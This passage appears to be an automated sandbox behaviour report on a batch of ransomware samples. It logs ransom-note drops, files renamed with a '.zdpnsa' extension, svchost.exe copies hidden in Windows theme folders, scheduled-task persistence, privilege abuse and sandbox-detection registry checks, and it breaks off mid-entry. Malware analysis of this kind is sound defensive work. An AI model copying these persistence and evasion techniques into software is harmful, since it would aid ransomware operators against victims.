HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File created C:\Program Files\Crashpad\reports\HOW TO RESTORE YOUR FILES.TXT HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\ca.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\7zG.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-059d3c46ce6ff055f8a28f5d2a138a266c4743138366af64a2b6c34efadb38c2.exe File created C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\_platform_specific\HOW TO RESTORE YOUR FILES.TXT HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\ba.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\fy.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-059d3c46ce6ff055f8a28f5d2a138a266c4743138366af64a2b6c34efadb38c2.exe File created C:\Program Files\7-Zip\7z.exe.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-059d3c46ce6ff055f8a28f5d2a138a266c4743138366af64a2b6c34efadb38c2.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\7z.sfx HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\ast.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File created C:\Program Files\Google\Chrome\Application\123.0.6312.123\default_apps\HOW TO RESTORE YOUR FILES.TXT HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\it.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File created C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\_platform_specific\win_x64\HOW TO RESTORE YOUR FILES.TXT HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt.zdpnsa HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File created C:\Program Files\7-Zip\Lang\HOW TO RESTORE YOUR FILES.TXT HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe File opened for modification C:\Program Files\7-Zip\Lang\fi.txt HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\Resources\Themes\aero\Shell\UT6x3fc5xmgM3c\svchost.exe windlogon.exe File opened for modification C:\Windows\Resources\Themes\aero\Shell\UT6x3fc5xmgM3c\svchost.exe windlogon.exe File created C:\Windows\Resources\Themes\aero\Shell\D90ffqe921ShG36\svchost.exe svchost.exe File opened for modification C:\Windows\Resources\Themes\aero\Shell\D90ffqe921ShG36\svchost.exe svchost.exe File created C:\Windows\3.exe Tempdii3doe243v.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3228 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 3 IoCs
pid Process 6064 AdvancedRun.exe 1560 AdvancedRun.exe 6844 AdvancedRun.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0009000000023d3b-421.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 12 IoCs
pid pid_target Process procid_target 5492 3292 WerFault.exe 138 1184 3292 WerFault.exe 138 1540 5352 WerFault.exe 175 5712 7036 WerFault.exe 217 6772 7036 WerFault.exe 217 6724 2692 WerFault.exe 242 116 2692 WerFault.exe 242 5692 7532 WerFault.exe 303 6776 7532 WerFault.exe 303 8132 5464 WerFault.exe 342 6120 5464 WerFault.exe 342 7956 4228 WerFault.exe 136 -
System Location Discovery: System Language Discovery 1 TTPs 54 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-6827d14360eef20e4f3e1935a896ffae85478a204bcb2e40ad7ea8e4ef08e00e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Sodin.vho-d6dbbba55174d4724a6bd9f2d52a8b81bc57e43b1cf59f170cb2b0279614cf94.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AdvancedRun.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language windlogon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-21903a861055a5164a0b7ac7b6383006aa3f74308c2cc0891e5815f0e5d72643.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-4b2e90180682a594c32e5d6e8b5c93f3263551058d589171cc89a1a8ad55eec9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Gen.gen-7bcbc81dbfbc85b4c7c40f44931788a814ded426317e6ea9456cc65c37341c92.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.gen-3c64050b054ba89ddd95db68e2ef6008f2540ba9d77810012374b67e1748381e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AdvancedRun.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Tempdii3doe243v.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-d474810774f1cb8002cc06e28f9729d2c674755aa0293584931fb46edc6307e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.gen-187329e42948ef198658234eed2b95a769decf507415a6e4acc1a1eb4429e1db.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-30b1a884738e4fc2f2c2e0037be1be4783042022742acd496995cde5414250b6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Convagent.gen-c98d09ba3d5222845d9ef8aca435cd9162ff4e1f27cafa3ff8bfae30c95f6706.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-39842ae8902d15a0525bceee971c045af884abf28e0a9af45deab8a4f68d5c0c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-957c86f5222d243cbae50525a9dca86d0b4cfc0c95daee34037147984f07007b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Regen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Agent.gen-0001ed874cf963c62c00f665d7c10b5edd9a7b0e64874562e80cd01a03eca81d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-10ee0a49ff630049c246af92f3233e6673294f81b92a68d80fab344ea1078950.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-c1e1c7ceaf74c6f65da3986b27909eeaaef8743b8a41671480a495ef16f73588.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AdvancedRun.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.gen-adf7015d8a0e1ee945f6171ea9cd6ebe903954d8964787f9dc36676e1b8ac809.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ResHacker-RH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan.MSIL.Crypt.gen-068075b2db3f2f529ebca0c265dd70a337bcedd8997393fdb90dbc03719598fa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AdvancedRun.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language windlogon.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5884 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 6548 timeout.exe 2172 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 6928 taskkill.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 6736 reg.exe 7680 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5884 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 9136 schtasks.exe 5728 schtasks.exe 1320 schtasks.exe 5012 schtasks.exe 8728 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1364 powershell.exe 1364 powershell.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1304 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 3420 7zFM.exe Token: 35 3420 7zFM.exe Token: SeSecurityPrivilege 3420 7zFM.exe Token: SeDebugPrivilege 1364 powershell.exe Token: SeDebugPrivilege 1620 taskmgr.exe Token: SeSystemProfilePrivilege 1620 taskmgr.exe Token: SeCreateGlobalPrivilege 1620 taskmgr.exe Token: SeDebugPrivilege 1304 taskmgr.exe Token: SeSystemProfilePrivilege 1304 taskmgr.exe Token: SeCreateGlobalPrivilege 1304 taskmgr.exe Token: 33 1620 taskmgr.exe Token: SeIncBasePriorityPrivilege 1620 taskmgr.exe Token: SeDebugPrivilege 4204 HEUR-Trojan-Ransom.MSIL.Blocker.gen-c1e1c7ceaf74c6f65da3986b27909eeaaef8743b8a41671480a495ef16f73588.exe Token: SeDebugPrivilege 3864 HEUR-Trojan-Ransom.MSIL.Gen.gen-7bcbc81dbfbc85b4c7c40f44931788a814ded426317e6ea9456cc65c37341c92.exe Token: SeDebugPrivilege 1428 owxJMykQ.exe Token: SeDebugPrivilege 3784 HEUR-Trojan-Ransom.Win32.Generic-0febad4248c26c3b44dc525eb67fa7481aa4caff7744f873a9d1c4ea8251d204.exe Token: SeDebugPrivilege 2468 powershell.exe Token: SeDebugPrivilege 3468 powershell.exe Token: SeDebugPrivilege 2416 HEUR-Trojan-Ransom.Win32.Generic-895407b3391e5c9327a137d72f47171b86177eae4646a47cbeaaa19f36226835.exe Token: SeDebugPrivilege 1884 svhost.exe Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 5704 Client.exe Token: SeDebugPrivilege 6064 AdvancedRun.exe Token: SeDebugPrivilege 1560 AdvancedRun.exe Token: SeImpersonatePrivilege 6064 AdvancedRun.exe Token: SeImpersonatePrivilege 1560 AdvancedRun.exe Token: SeDebugPrivilege 5660 powershell.exe Token: SeDebugPrivilege 5692 powershell.exe Token: SeDebugPrivilege 5716 powershell.exe Token: SeDebugPrivilege 3852 HEUR-Trojan.MSIL.Crypt.gen-068075b2db3f2f529ebca0c265dd70a337bcedd8997393fdb90dbc03719598fa.exe Token: SeDebugPrivilege 5840 powershell.exe Token: SeDebugPrivilege 5852 powershell.exe Token: SeDebugPrivilege 5980 powershell.exe Token: SeIncreaseQuotaPrivilege 3468 powershell.exe Token: SeSecurityPrivilege 3468 powershell.exe Token: SeTakeOwnershipPrivilege 3468 powershell.exe Token: SeLoadDriverPrivilege 3468 powershell.exe Token: SeSystemProfilePrivilege 3468 powershell.exe Token: SeSystemtimePrivilege 3468 powershell.exe Token: SeProfSingleProcessPrivilege 3468 powershell.exe Token: SeIncBasePriorityPrivilege 3468 powershell.exe Token: SeCreatePagefilePrivilege 3468 powershell.exe Token: SeBackupPrivilege 3468 powershell.exe Token: SeRestorePrivilege 3468 powershell.exe Token: SeShutdownPrivilege 3468 powershell.exe Token: SeDebugPrivilege 3468 powershell.exe Token: SeSystemEnvironmentPrivilege 3468 powershell.exe Token: SeRemoteShutdownPrivilege 3468 powershell.exe Token: SeUndockPrivilege 3468 powershell.exe Token: SeManageVolumePrivilege 3468 powershell.exe Token: 33 3468 powershell.exe Token: 34 3468 powershell.exe Token: 35 3468 powershell.exe Token: 36 3468 powershell.exe Token: SeIncreaseQuotaPrivilege 2468 powershell.exe Token: SeSecurityPrivilege 2468 powershell.exe Token: SeTakeOwnershipPrivilege 2468 powershell.exe Token: SeLoadDriverPrivilege 2468 powershell.exe Token: SeSystemProfilePrivilege 2468 powershell.exe Token: SeSystemtimePrivilege 2468 powershell.exe Token: SeProfSingleProcessPrivilege 2468 powershell.exe Token: SeIncBasePriorityPrivilege 2468 powershell.exe Token: SeCreatePagefilePrivilege 2468 powershell.exe Token: SeBackupPrivilege 2468 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3420 7zFM.exe 3420 7zFM.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1620 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe 1304 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4228 HEUR-Trojan-Ransom.Win32.Sodin.vho-d6dbbba55174d4724a6bd9f2d52a8b81bc57e43b1cf59f170cb2b0279614cf94.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1620 wrote to memory of 1304 1620 taskmgr.exe 91 PID 1620 wrote to memory of 1304 1620 taskmgr.exe 91 PID 1364 wrote to memory of 2220 1364 powershell.exe 96 PID 1364 wrote to memory of 2220 1364 powershell.exe 96 PID 2220 wrote to memory of 4412 2220 cmd.exe 97 PID 2220 wrote to memory of 4412 2220 cmd.exe 97 PID 2220 wrote to memory of 3660 2220 cmd.exe 98 PID 2220 wrote to memory of 3660 2220 cmd.exe 98 PID 2220 wrote to memory of 3660 2220 cmd.exe 98 PID 2220 wrote to memory of 4204 2220 cmd.exe 99 PID 2220 wrote to memory of 4204 2220 cmd.exe 99 PID 2220 wrote to memory of 4204 2220 cmd.exe 99 PID 2220 wrote to memory of 3864 2220 cmd.exe 100 PID 2220 wrote to memory of 3864 2220 cmd.exe 100 PID 2220 wrote to memory of 3864 2220 cmd.exe 100 PID 2220 wrote to memory of 396 2220 cmd.exe 103 PID 2220 wrote to memory of 396 2220 cmd.exe 103 PID 2220 wrote to memory of 396 2220 cmd.exe 103 PID 4412 wrote to memory of 3704 4412 HEUR-Trojan-Ransom.MSIL.Blocker.gen-392c6cc91ee135bd9101321f153f5a0354ef0271498448319260d54bd3a5454b.exe 104 PID 4412 wrote to memory of 3704 4412 HEUR-Trojan-Ransom.MSIL.Blocker.gen-392c6cc91ee135bd9101321f153f5a0354ef0271498448319260d54bd3a5454b.exe 104 PID 4412 wrote to memory of 3704 4412 HEUR-Trojan-Ransom.MSIL.Blocker.gen-392c6cc91ee135bd9101321f153f5a0354ef0271498448319260d54bd3a5454b.exe 104 PID 4412 wrote to memory of 1428 4412 HEUR-Trojan-Ransom.MSIL.Blocker.gen-392c6cc91ee135bd9101321f153f5a0354ef0271498448319260d54bd3a5454b.exe 105 PID 4412 wrote to memory of 1428 4412 HEUR-Trojan-Ransom.MSIL.Blocker.gen-392c6cc91ee135bd9101321f153f5a0354ef0271498448319260d54bd3a5454b.exe 105 PID 2220 wrote to memory of 4364 2220 cmd.exe 106 PID 2220 wrote to memory of 4364 2220 cmd.exe 106 PID 2220 wrote to memory of 4364 2220 cmd.exe 106 PID 2220 wrote to memory of 4664 2220 cmd.exe 107 PID 2220 wrote to memory of 4664 2220 cmd.exe 107 PID 2220 wrote to memory of 3784 2220 cmd.exe 108 PID 2220 wrote to memory of 3784 2220 cmd.exe 108 PID 2220 wrote to memory of 1456 2220 cmd.exe 109 PID 2220 wrote to memory of 1456 2220 cmd.exe 109 PID 2220 wrote to memory of 1456 2220 cmd.exe 109 PID 3704 wrote to memory of 2468 3704 Installer.exe 112 PID 3704 wrote to memory of 2468 3704 Installer.exe 112 PID 3704 wrote to memory of 2468 3704 Installer.exe 112 PID 3660 wrote to memory of 3468 3660 